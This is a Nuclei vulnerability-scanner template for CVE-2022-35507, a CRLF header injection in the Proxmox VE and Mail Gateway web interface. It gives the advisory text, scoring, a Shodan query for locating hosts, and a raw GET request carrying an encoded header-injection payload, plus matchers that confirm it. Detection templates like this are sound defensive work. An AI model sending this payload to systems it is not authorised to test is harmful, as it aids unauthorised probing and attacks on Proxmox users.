id: CVE-2022-35507 info: name: Proxmox - CRLF Injection author: DhiyaneshDk severity: high description: | A response-header CRLF injection vulnerability in the Proxmox Virtual Environment (PVE) and Proxmox Mail Gateway (PMG) web interface allows a remote attacker to set cookies for a victim's browser that are longer than the server expects, causing a client-side DoS. This affects Chromium-based browsers because they allow injection of response headers with %0d. This is fixed in pve-http-server 4.1-3. impact: | Attackers can inject response headers with CRLF characters to set malicious cookies in victims' Chromium-based browsers, causing client-side denial of service and potentially facilitating session fixation attacks on Proxmox users. remediation: | Update pve-http-server to version 4.1-3 or later that properly validates and strips CRLF characters from response headers. reference: - https://git.proxmox.com/?p=pve-http-server.git%3Ba=commitdiff%3Bh=936007ae0241811093155000486da171379c23c2 - https://github.com/advisories/GHSA-xfgp-gpjw-wmqr - https://starlabs.sg/blog/2022/12-multiple-vulnerabilites-in-proxmox-ve--proxmox-mail-gateway/#bug-0x02-crlf-injection-in-response-headers classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:H cvss-score: 7.1 cve-id: CVE-2022-35507 cwe-id: CWE-74 epss-score: 0.35702 epss-percentile: 0.97161 cpe: cpe:2.3:a:proxmox:proxmox_mail_gateway:-:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: proxmox product: proxmox_mail_gateway shodan-query: html:"Proxmox = {" tags: cve,cve2022,proxmox,crlf,vuln http: - raw: - | GET /404%0dnew-header:value%0da: HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - "contains(all_headers, 'new-header:value')" - "status_code == 501" condition: and # digest: 4a0a00473045022100aa3f79fd46c4342f1d43605c04f45b1ccbd9bad4022fddc28f5a11fc14c5cca60220249e72187997bfa45aeca7a39d4da81f7a16a3177dcc21e0d28fa648be3c2024:922c64590222798bb761d5b6d8e72950